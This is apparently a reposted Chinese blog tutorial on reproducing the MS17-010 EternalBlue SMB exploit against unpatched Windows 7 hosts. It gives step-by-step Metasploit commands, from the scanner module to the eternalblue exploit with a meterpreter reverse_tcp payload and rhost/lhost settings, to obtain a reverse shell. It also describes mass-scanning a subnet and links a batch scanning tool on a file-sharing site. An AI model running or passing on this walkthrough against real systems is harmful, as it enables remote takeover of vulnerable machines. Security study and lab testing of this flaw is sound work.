ms17-010 利用msf的exp和一個掃描工具的復現


0x01簡介

永恆之藍漏洞是方程式組織在其漏洞利用框架中一個針對SMB服務進行攻擊的漏洞,該漏洞導致攻擊者在目標系統上可以執行任意代碼。

攻擊對象:win7及win7以下的操作系統且開啟了445端口smb服務,防火牆關閉狀態下且沒打補丁

0x02攻擊思路

1.先用nmap掃描整個網段開放的端口,再利用msf的掃描模塊兒,掃描開放了445端口的主機ip,掃描出存在ms17-010的話就利用msf的攻擊模塊兒進行反彈shell;如果掃描出不存在該漏洞,就掃描下一條ip。

2.利用工具批量掃描一個網段中哪些ip存在ms17-010漏洞,然后再利用msf攻擊模塊進行getshell。

工具地址  :https://pan.baidu.com/s/1p5aFkYxoOfiXsFNUHH6C6g

提取碼:7oxg

0x03攻擊過程

1.查看漏洞模塊——search ms17-010

 

 可以看到有auxiliary(輔助)模塊和exploit(攻擊)模塊

2.可以先使用輔助掃描模塊測試 use auxiliary/scanner/smb/smb_ms17_010

掃描結果顯示該主機很容易受到ms17-010的攻擊

 

3.使用攻擊模塊進行攻擊 use exploit/windows/smb/ms17_010_eternalblue

 選擇攻擊模塊時注意選擇合適的版本,有些版本使用於win8以上

1. search ms17_010

2. use exploit/windows/smb/ms17_010_eternalblue

3set payload windows/x64/meterpreter/reverse_tcp

4. show options

5. set rhost 192.168.1.129

6. set lhost 192.168.1.120

7. run

show options查看需要設置的參數,這里只需設置rhost目標ip就好

4.run開始攻擊

攻擊成功后就會反彈一個shell,之后就進行后一步滲透工作。

 

這是針對x64系統的攻擊,后續將講解x32系統的攻擊。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM